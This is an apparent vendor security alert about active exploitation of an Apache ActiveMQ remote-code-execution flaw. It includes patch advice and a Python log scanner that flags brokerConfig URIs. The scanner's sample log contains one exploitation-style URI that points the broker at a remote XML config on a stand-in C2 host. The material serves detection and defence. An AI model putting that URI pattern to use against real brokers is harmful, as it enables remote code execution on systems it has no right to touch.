Alert Exploitation of CVE-2026-34197 in Apache ActiveMQ

🚨 Alert: Exploitation of CVE-2026-34197 in Apache ActiveMQ

TeamT5 has detected that a critical vulnerability (CVE-2026-34197) in Apache ActiveMQ has been actively exploited by threat actors, including the China-nexus APT SLIME88. Our investigation revealed that after exploitation, SLIME88 deployed SoxAgent RAT to compromise Linux devices and build an ORB (operational relay box) network, currently tracked under the temporary name GOBLIN14.

📅 Timeline of Events

  • Earliest SLIME88 attack: April 7, shortly after the vulnerability was disclosed.
  • Affected regions: Victims included IT and manufacturing entities in the US, South Korea, India, France, and more.

🔍 Vulnerability Details

CVE-2026-34197 is a remote code execution (RCE) vulnerability in Apache ActiveMQ, an open-source Java message broker widely used in enterprise environments, including financial institutions and healthcare sectors. Threat actors can exploit this vulnerability by sending a crafted HTTP request to Apache ActiveMQ’s Jolokia API endpoint, triggering the broker to fetch a malicious XML configuration file from the C2 server, resulting in remote code execution.

⚠️ Recommendations

  • Patch: Apache patched CVE-2026-34197 in ActiveMQ Classic Version 6.2.3 and 5.19.4, released on March 30 and 31, respectively. We highly recommend applying the patch as soon as possible.
  • Change Default Credentials: It is crucial to change default credentials (e.g., admin/admin) and restrict access to Jolokia (/api/jolokia) and the Web Console.
  • Forensic Artifacts: Check the ActiveMQ broker log (activemq.log), for example with a log parser, for URIs containing vm:// and ?brokerConfig, which may indicate exploitation attempts.
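As an added example (not code from TeamT5 or the ActiveMQ project), a small Python scanner implementing the last recommendation: it reads activemq.log lines, extracts any vm:// URI, and reports those carrying a brokerConfig parameter, separating configs fetched over HTTP(S) from local file references. The sample log lines, the hostname c2.example.invalid and the file paths are constructed for illustration.

```python
import re
import sys
from typing import Iterable, Optional
from urllib.parse import parse_qs, urlsplit

# A vm:// URI runs until whitespace or a quote/bracket in the log line.
VM_URI_RE = re.compile(r'vm://[^\s"\'<>]+')
# brokerConfig values that make the broker fetch its XML over the network.
REMOTE_RE = re.compile(r'(?:^|:)https?://', re.IGNORECASE)


def analyze_line(line: str) -> Optional[dict]:
    """Return a finding for a vm:// URI carrying ?brokerConfig, else None."""
    m = VM_URI_RE.search(line)
    if not m:
        return None
    uri = m.group(0)
    params = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    if "brokerConfig" not in params:
        return None
    config = params["brokerConfig"][0]
    # A legitimate broker references a local file; a remote http(s) source
    # matches the exploitation pattern this alert describes.
    return {"uri": uri, "brokerConfig": config, "remote": bool(REMOTE_RE.search(config))}


def scan_log(lines: Iterable[str]) -> list:
    """Scan activemq.log lines; return findings with 1-based line numbers."""
    findings = []
    for n, line in enumerate(lines, 1):
        f = analyze_line(line)
        if f:
            f["line_no"] = n
            findings.append(f)
    return findings


# Constructed sample lines in activemq.log style (hostname is a placeholder).
SAMPLE_LOG = """\
2026-04-07 03:12:41,105 | INFO  | Connector vm://localhost started | org.apache.activemq.broker.TransportConnector | main
2026-04-07 03:15:02,771 | WARN  | Transport Connection to: tcp://203.0.113.5:51234 failed: vm://localhost?brokerConfig=xbean:http://c2.example.invalid/poc.xml | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport
2026-04-07 03:16:10,002 | INFO  | Using Persistence Adapter: KahaDBPersistenceAdapter | org.apache.activemq.broker.BrokerService | main
2026-04-07 03:17:33,918 | INFO  | Connector vm://localhost?brokerConfig=xbean:file:/opt/activemq/conf/activemq.xml started | org.apache.activemq.broker.TransportConnector | main
""".splitlines()

if __name__ == "__main__":
    if len(sys.argv) > 1:  # usage: python scan_activemq.py /path/to/activemq.log
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            lines = fh.readlines()
    else:
        lines = SAMPLE_LOG
    for f in scan_log(lines):
        print(f"line {f['line_no']}: {'REMOTE CONFIG' if f['remote'] else 'local config'}: {f['uri']}")
```

A remote brokerConfig hit on a broker that never referenced a non-local configuration is the finding to escalate; a local file hit is normal and only worth checking against the expected configuration path.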

For more detailed information, please refer to the full article.

This post is licensed under CC BY 4.0 by the author.